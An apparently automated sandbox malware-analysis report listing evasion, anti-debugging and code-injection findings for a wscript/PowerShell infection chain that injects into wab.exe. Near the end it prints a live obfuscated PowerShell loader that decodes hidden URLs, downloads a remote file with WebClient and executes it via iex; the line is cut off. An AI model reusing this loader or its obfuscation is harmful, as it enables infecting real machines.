Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Queries sensitive service information (via WMI, WIN32_SERVICE, often done to detect sandboxes)

Source: C:\Windows\System32\wscript.exe

WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Service

Switches to a custom stack to bypass stack traces

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API/Special instruction interceptor: Address: 45859B3

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

19_2_0040DD85

Contains long sleeps (>= 3 min)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Found WSH timer for Javascript or VBS script (likely evasive script)

Source: C:\Windows\System32\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Window found: window name: WSH-Timer			Jump to behavior

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5008	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 4878	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5855	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3864	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Window / User API: threadDelayed 1920	Jump to behavior

Found large amount of non-executed APIs

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API coverage: 9.5 %

May sleep (evasive loops) to hinder dynamic analysis

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7708	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840	Thread sleep count: 5855 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7840	Thread sleep count: 3864 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7872	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe TID: 7468	Thread sleep count: 1920 > 30	Jump to behavior

Sample execution stops while process was sleeping (likely an evasion)

Source: C:\Windows\System32\conhost.exe

Last function: Thread delayed

Sleep loop found (likely to delay execution)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Thread sleep count: Count: 1920 delay: -5

Jump to behavior

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B210F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	10_2_22B210F1
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B26580 LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,LdrInitializeThunk,FindFirstFileExA,	10_2_22B26580
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 19_2_0040AE51 FindFirstFileW,FindNextFileW,	19_2_0040AE51
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 21_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	21_2_00407EF8
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 22_2_00407898 FindFirstFileA,FindNextFileA,strlen,strlen,	22_2_00407898

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_00418981 memset,GetSystemInfo,

19_2_00418981

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: wab.exe, 0000000A.00000002.2246278943.000000000051A000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWH%V%SystemRoot%\system32\mswsock.dll
Source: wab.exe, 0000000A.00000002.2246278943.0000000000558000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWz
Source: wscript.exe, 00000000.00000003.1329861249.000001C22DBA7000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: me ServerGoogle Chrome Elevation Service (GoogleChromeElevationService)Group Policy ClientGraphicsPerfSvcGoogle Update Service (gupdate)Google Update Service (gupdatem)Human Interface Device ServiceHV Host ServiceWindows Mobile Hotspot ServiceIKE and AuthIP IPsec Keying ModulesMicrosoft Store Install ServiceIP HelperIP Translation Configuration ServiceCNG Key IsolationKtmRm for Distributed Transaction CoordinatorServerWorkstationGeolocation ServiceWindows License Manager ServiceLink-Layer Topology Discovery MapperTCP/IP NetBIOS HelperLSMLanguage Experience ServiceDownloaded Maps ManagerMcpManagementServiceMicrosoft Edge Elevation Service (MicrosoftEdgeElevationService)Windows Mixed Reality OpenXR ServiceMozilla Maintenance ServiceWindows Defender FirewallDistributed Transaction CoordinatorMicrosoft iSCSI Initiator ServiceWindows InstallerMicrosoft Keyboard FilterNatural AuthenticationNetwork Connectivity AssistantNetwork Connection BrokerNetwork Connected Devices Auto-SetupNetlogonNetwork ConnectionsNetwork List ServiceNetSetupSvcNet.Tcp Port Sharing ServiceMicrosoft Passport ContainerMicrosoft PassportNetwork Location AwarenessNetwork Store Interface ServicePeer Networking Identity ManagerPeer Networking GroupingProgram Compatibility Assistant ServiceBranchCacheWindows Perception Simulation ServicePerformance Counter DLL HostPhone ServicePerformance Logs & AlertsPlug and PlayPNRP Machine Name Publication ServicePeer Name Resolution ProtocolIPsec Policy AgentPowerPrinter Extensions and NotificationsUser Profile ServiceWindows PushToInstall ServiceQuality Windows Audio Video ExperienceRemote Access Auto Connection ManagerRemote Access Connection ManagerRouting and Remote AccessRemote RegistryRetail Demo ServiceRadio Management ServiceRPC Endpoint MapperRemote Procedure Call (RPC) LocatorRemote Procedure Call (RPC)Security Accounts ManagerSmart CardSmart Card Device Enumeration ServiceTask SchedulerSmart Card Removal PolicyWindows BackupSecondary Log-onWindows Security ServicePayments and NFC/SE ManagerSystem Event Notification ServiceWindows Defender Advanced Threat Protection ServiceSensor Data ServiceSensor ServiceSensor Monitoring ServiceRemote Desktop ConfigurationSystem Guard Runtime Monitor BrokerInternet Connection Sharing (ICS)Spatial Data ServiceShell Hardware DetectionShared PC Account ManagerMicrosoft Storage Spaces SMPMicrosoft Windows SMS Router Service.SNMP TrapWindows Perception ServicePrint SpoolerSoftware ProtectionSSDP DiscoveryOpenSSH Authentication AgentSecure Socket Tunneling Protocol ServiceState Repository ServiceWindows Image Acquisition (WIA)Storage ServiceSpot VerifierMicrosoft Software Shadow Copy ProviderSysMainSystem Events BrokerTouch Keyboard and Handwriting Panel ServiceTelephonyRemote Desktop ServicesThemesStorage Tiers ManagementTime BrokerWeb Account ManagerDistributed Link Tracking ClientRecommended Troubleshooting ServiceWindows Modules InstallerAuto Time Zone UpdaterUser Experience Virtualization ServiceRemote
Source: wab.exe, 0000000A.00000002.2246278943.0000000000579000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bhvB999.tmp.19.dr	Binary or memory string: https://r.bing.com/rb/18/jnc,nj/6hU_LneafI_NFLeDvM367ebFaKQ.js?bu=Dx0ma3d6fXRucbIBtQEmpQEmuAE&or=w
Source: powershell.exe, 00000002.00000002.2065998160.00000137B1270000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW

Source: C:\Program Files (x86)\Windows Mail\wab.exe

API call chain: ExitProcess graph end node

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging

Hides threads from debuggers

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread information set: HideFromDebugger			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Thread information set: HideFromDebugger			Jump to behavior

Checks if the current process is being debugged

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process queried: DebugPort			Jump to behavior

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Code function: 5_2_04819AD9 LdrInitializeThunk,

5_2_04819AD9

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_22B22639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

10_2_22B22639

Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

19_2_0040DD85

Contains functionality to dynamically determine API calls

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 19_2_004044A4 LoadLibraryW,GetProcAddress,FreeLibrary,MessageBoxW,

19_2_004044A4

Contains functionality to read the PEB

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_22B24AB4 mov eax, dword ptr fs:[00000030h]

10_2_22B24AB4

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Source: C:\Program Files (x86)\Windows Mail\wab.exe

Code function: 10_2_22B2724E GetProcessHeap,

10_2_22B2724E

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B22639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_22B22639
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B22B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	10_2_22B22B1C
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Code function: 10_2_22B260E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	10_2_22B260E2

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: amsi64_7548.amsi.csv, type: OTHER
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 7792, type: MEMORYSTR

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3A80000			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: FFDCC			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr Stumpnser Midernes Fugtighedscremerne tilkaldte Lancinated Territorializations Feest Digammate Fattigfint dossiers Konvojeredes Rudyard Filmologerne Tandpiner Griqua Augustly Pantningens Univalve Scalping Spectromicroscopical Autoklaveringerne Hjlpeprsters Brotherlike Inflationr';If (${host}.CurrentCulture) {$Anthranyl++;}Function Brandmyndighederne($Emblemers){$eventyrroman=$Emblemers.Length-$Anthranyl;$Hawsing='SUBsTRI';$Hawsing+='ng';For( $Daghesh=1;$Daghesh -lt $eventyrroman;$Daghesh+=2){$Stumpnser+=$Emblemers.$Hawsing.Invoke( $Daghesh, $Anthranyl);}$Stumpnser;}function Opdateringsprogrammet($Etruscan){ & ($Androlepsia) ($Etruscan);}$Garvin=Brandmyndighederne 'AM.o zCi,l,lFaI/H5 .R0B ,( W i.n,dSoLw sM ,N T. 1.0A.A0 ;F AW i nU6.4,;. Nx 6 4B;S TrTv : 1 2S1 . 0 )V SGPe cVkIoT/B2 0I1S0R0 1,0I1T SF iOr eSfTo,xH/C1U2 1 .B0 ';$Maltreated=Brandmyndighederne '.URs e rC-KA g.e,n tI ';$Lancinated=Brandmyndighederne 'Oh t,t pPs :B/H/,c o.nMtAe mSeRg as..cToWm .JdUo./sN e dVsTlJa gpn iSnSgAs.. dSwOpS>Kh t tsp s :P/,/Pm o,vBiDe sRmOa cRk t a,lHkB.Rc o mS/,N.eOdHsUlOaSgCnFi.nBg s,.,dSwGp ';$shrugging=Brandmyndighederne 'S> ';$Androlepsia=Brandmyndighederne '.iYe.xr ';$Trendies='Digammate';$Debarrance = Brandmyndighederne 'AeBc.hSoG %Ba p pFdPaWtoa %O\AP.r oGs kgr i.b.eXr eNsK.,BUectT &C&, e c hSoT Kt ';Opdateringsprogrammet (Brandmyndighederne ' $,g l,o.b.aHl,: s.a.l g,s.e nEh,eFdMe,rHsD=P( c mRds K/ cC ,$mD e,b,aVr rAa,n cAeS) ');Opdateringsprogrammet (Brandmyndighederne ',$Rgiluo b aCl,:itRi l kPaUl.dTt,eS=.$PLAaBn c,iSn.aRtLe dT.isKp lRi t.(,$,sFh,rGuNgTgVi nMgS)F ');Opdateringsprogrammet (Brandmyndighederne ' [BNFeAtE. S ecr v,iTc.e.P,o iSnPtVMFaDn,aBgFe rJ]h: : S eBcGu,rti tSyuPNr oPtuoPcVoSl A= T[CN eFtL. SMe,c.usr,iEt,ySP r,oStSo cSoIlSTEy pSe ],:V: T lTsU1E2. ');$Lancinated=$tilkaldte[0];$Acupressure= (Brandmyndighederne 'S$Ag,l o.bGaPlS:SSKoAm mHeDr,f,uOgDl e,n eGtftCeCt,s = NMe.wS- OTbSj,eGc tS .SByRs tCeTms.INseAt .,WIeDbKCclIi eDn t');$Acupressure+=$salgsenheders[1];Opdateringsprogrammet ($Acupressure);Opdateringsprogrammet (Brandmyndighederne 'D$SSSo mFmSe r fEu gRlSeKnSe t tAeHtHs .,H e a,dCeBr s [B$MMFaHl.t.r,e a t e d,]H=D$ GEa rAvRiRnT ');$Nourishments=Brandmyndighederne 'P$kSCoGmLmOeEr fFu,g lUe.nSe t t eOtOss.FD.o w nFl oSa d F.iUlTe ( $ L a,nKc i nEa tFeSd., $ HRj.l p.e pmr sJtFeAr.s ), ';$Hjlpeprsters=$salgsenheders[0];Opdateringsprogrammet (Brandmyndighederne '.$Kg,lOo b.a lS:BAvshp e.r.sSiAo,nTs 2 3,=.(STCeUs tK-BPNart.h S$IH jMlAp,e p r,s,t e,rMs )K ');while (!$Aspersions23) {Opdateringsprogrammet (Brandmyndighe	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Proskriberes.Bet && echo t"	Jump to behavior
